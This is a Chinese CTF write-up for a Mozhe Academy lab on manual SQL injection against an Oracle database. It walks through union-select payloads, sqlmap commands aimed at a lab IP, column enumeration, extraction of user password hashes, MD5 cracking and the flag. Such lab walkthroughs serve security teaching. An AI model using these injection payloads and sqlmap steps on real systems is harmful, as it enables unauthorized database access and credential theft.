墨者学院 手工注入题解(oracle数据库)

简介

Oracle 数据库系统,是美国ORACLE公司(甲⻣⽂)提供的以分布式数据库为核⼼的⼀组软件 产品。是⽬前世界上使⽤最为⼴泛的,数据库管理系统。

以下是手工注入的流程:

1、判断注入点

使用 and 1=1 进行拼接

2、确定字段数

使用语句 order by

最终确定为只有两个字段

3、确定返回点

使用语句 ?id=-1 union select 'null','null' from dual

4、确定数据库名称

使用语句 sqlmap -u http://124.70.64.48:43361/new_list.php?id=1 --current-db 查看当前数据库

5、确定数据库中的表名

使用语句 sqlmap -u http://124.70.64.48:43361/new_list.php?id=1 -D SYSTEM --tables

6、查询列名

使用语句 id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%') from dual 进行模糊搜索

确定第一列为 user_name

使用语句 id=-1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name like '%USER%' and column_name <> 'USER_NAME') from dual 进行模糊搜索

确定第二列为 user_pwd

7、获取账号以及密码

使用语句 new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1

确定zhong 的密码为 1c63129ae9asc60asdua94d3e00495

new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong'

确定 hu 的密码为 1c63129ae9db9g20asdua94d3e00495

new_list.php?id=-1 union select USER_NAME,USER_PWD from "sns_users" where rownum=1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'

确定 mozhe 的密码为 48b58ef8be01ef64e7de3f764ec83d2d

8、使用MD5进行密码解密

最终确定 mozhe 的密码为 267581

9、登录后台

10、提交KEY

KEY:mozhe89c06b9c5a5b67c98c500a1ce66

安全

网络安全靠人民,网络安全为人民

相关推荐
快乐点吧几秒前
【MongoDB】windows安装、配置、启动
数据库·windows·mongodb
yangmf20403 分钟前
私有知识库 Coco AI 实战(二):摄入 MongoDB 数据
数据库·人工智能·mongodb·coco ai
努力进修8 分钟前
【金仓数据库征文】金仓数据库:开启未来技术脑洞,探索数据库无限可能
数据库·金仓数据库 2025 征文·数据库平替用金仓
键盘飞行员9 分钟前
使用 Node、Express 和 MongoDB 构建一个项目工程
数据库·mongodb·express
小白教程13 分钟前
MySQL主从数据库配置教程
数据库·mysql·adb·mysql8.0主从配置
Synfuture阳途14 分钟前
网络准入控制系统:2025年网络安全的坚固防线
网络·安全·web安全
学习OK呀19 分钟前
日常代码中加解密技术的使用
java·后端
饭来_22 分钟前
配置 RDP 远程桌面协议连接ubuntu服务器桌面
linux·运维·服务器
科技小E23 分钟前
EasyRTC音视频实时通话在线教育解决方案:打造沉浸式互动教学新体验
网络·音视频
Dcs24 分钟前
Java 消息代理:企业集成的 5 项基本技术
java